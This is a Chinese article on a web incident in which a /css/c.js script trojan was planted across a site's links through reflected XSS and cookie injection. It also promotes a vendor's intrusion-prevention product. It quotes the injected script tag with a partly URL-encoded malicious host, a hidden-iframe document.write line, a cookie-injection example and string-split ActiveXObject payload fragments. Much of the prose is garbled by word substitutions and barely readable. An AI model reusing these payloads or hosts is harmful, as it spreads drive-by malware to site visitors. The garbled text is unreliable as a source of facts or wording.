IE漏洞攻击剧增 最新/CSS/c.js木马防范手记

  • 时间:
  • 浏览:0

近日,一款利用IE7漏洞进行传播的脚本木马在网上太快传播,该木马利用搜索引擎检索站点漏洞,并进行自动传播。几天内,数万站点遭受感染,其中hongxiu.com、msn中国、东方财经网等都被入侵。

发现恶意软件

某日早上,某网站维护人员小任像往常一样打开了网站首页,随手点击了另另一个链接,想验证一下网站与非 可不可以 了正常访问,没想到简直触发了防病毒的软件的报警:发现恶意软件。心细的小任在一查之下大吃了一惊:首页的几乎所有链接都被上加了另另一个奇怪的网址http://c.nuclear3.com/css/c.js,而你什儿 js脚本,只是我触发防病毒软件报警的元凶。

无奈之下,小任想到了当事人单位的网络安全设备提供商启明星辰公司,并立刻联系上该公司驻当地人员,一起一起提供的还有网站的日志文件。

攻击者的手法

减慢,小任就得到了启明星辰工程师的反馈信息,在网站的/down.asp页面下,存在另另一个反射式的XSS漏洞,骇客只是我利用你什儿 漏洞,通过cookie 注入的土办法,将恶意脚本“<Script Src=http://c.nu%63%6Cear3.com/css/c.js></script> 注入到每另另一个网站链接中,以达到危害用户的目的。

  v 小知识:那先 叫反射式XSS?

Web客户端使用Server端脚本生成页面为用户提供数据时,原应着未经验证的用户数据被涵盖在页面中而未经HTML实体编码,客户端代码便不需要 注入到动态页面中。

在你什儿 例子里,骇客将恶意脚本嵌入URL,网站访问者一旦点击你什儿 链接,浏览器将认为恶意代码是来自网站,从而“放心”的执行。

小知识:cookie注入

Cookie注入是SQL注入攻击的什儿 表现形式,是系统直接使用"request("name")"获取客户提交的数据,并对客户提交的变量这麼过滤,而且在防注入进程中这麼限制Request.cookie所原应的。

另另一个典型的例子只是我javascript:alert(document.cookie="id="+escape(XX and "attack string")。

斩断注入黑手

了解了问題的根源,剩下的只是我防御问題了。在启明星辰工程师的协助下,通过安星远程网站安全检查服务,小任挨个清除了页面上所挂木马,一起还发现网站存在数个SQL注入和XSS漏洞,而原有的网站安全检查代码原应着无法进行语义一级的还原①,无法彻底杜绝这两类攻击,可不可以 了通过部署相应安全产品防止。在对比了数家国内外的Web安全防御产品后,该网站最终选则了天清入侵防御产品,其采用攻击机理分析土办法对Web威胁如SQL注入、XSS攻击等进行精确阻断。与传统的基于数据形态匹配和基于异常模型构建的Web安全相比,有着更低的漏报率和误报率。天清入侵防御产品上线后,当小任尝试用此前注入漏洞再次进行攻击时,发现在产品事件监视台上原应着及时再次出显了报警信息并予以了阻断。再次采用安星检查服务后发现,原应着无法嗅探出任何漏洞。

注①:继续拿/css/c.js木马举例该木马的注入代码是http://c.nuclear3.com/css/c.js,但你什儿 .js脚本并都有真正的攻击代码,而只是我一段代码:

document.write("<iframe src='http://fvgit.cn/01/index.htm' width='1150' height='0'></iframe>");

你什儿 脚本文件会在另另一个隐藏的框体中引用有害的链接:'http://fvgit.cn/01/index.htm,真正的攻击代码存在于你什儿 链接处,这段攻击代码异常简单,摈弃了头标签体标签,直接只是我攻击代码,且采用了替换躲避手法:

var ll=new ActiveXObject("snpv"+"w.Snap"+"shot View"+"er Cont"+"rol.1");}

rrooxx = "I" + "E" + "R" + "P" + "C" + "t" + "l" + ".I" + "ERP" + "Ctl.1";

你什儿 替换躲避手法可不可以 了使用到语义还原,原应着仅检查关键字,是无法发现和抵御此类攻击的。